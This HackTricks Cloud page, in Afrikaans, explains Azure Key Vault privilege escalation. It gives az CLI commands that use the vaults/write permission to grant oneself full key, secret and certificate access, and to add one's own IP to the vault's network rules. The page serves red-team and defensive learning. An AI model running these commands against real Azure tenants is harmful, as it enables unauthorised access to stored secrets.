HackTricks CloudAz - Key Vault Privesc
Tip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subscription plans!
- Sluit aan by die 💬 Discord group of die telegram group of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.
Azure Key Vault
Vir meer inligting oor hierdie diens, kyk:
Microsoft.KeyVault/vaults/write
’n Aanvaller met hierdie toestemming sal in staat wees om die beleid van ’n sleutelkluis te wysig (die sleutelkluis moet toegangbeleide gebruik in plaas van RBAC).
# If access policies in the output, then you can abuse it
az keyvault show --name <vault-name>
# Get current principal ID
az ad signed-in-user show --query id --output tsv
# Assign all permissions
az keyvault set-policy \
--name <vault-name> \
--object-id <your-object-id> \
--key-permissions all \
--secret-permissions all \
--certificate-permissions all \
--storage-permissions all
Pas Netwerkbeperkings Aan
Dit mag dalk moontlik wees dat jy genoeg toestemmings het om sensitiewe data (soos die waarde van ’n geheim) te bekom, maar jy kan dit nie bekom nie omdat die sleutelkluis beperk is tot ’n spesifieke netwerk. As jy die toestemming het om die netwerkbeperkings aan te pas, kan jy jou IP by die lys van toegelate IP’s voeg.
# Get the current network restrictions
az keyvault network-rule list --name <vault-name>
# Add your IP to the list
az keyvault network-rule add --name <vault-name> --ip-address <your-ip>
Tip
Leer & oefen AWS Hacking:
Leer & oefen GCP Hacking:
Leer & oefen Az Hacking:Ondersteun HackTricks
- Kyk na die subscription plans!
- Sluit aan by die 💬 Discord group of die telegram group of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.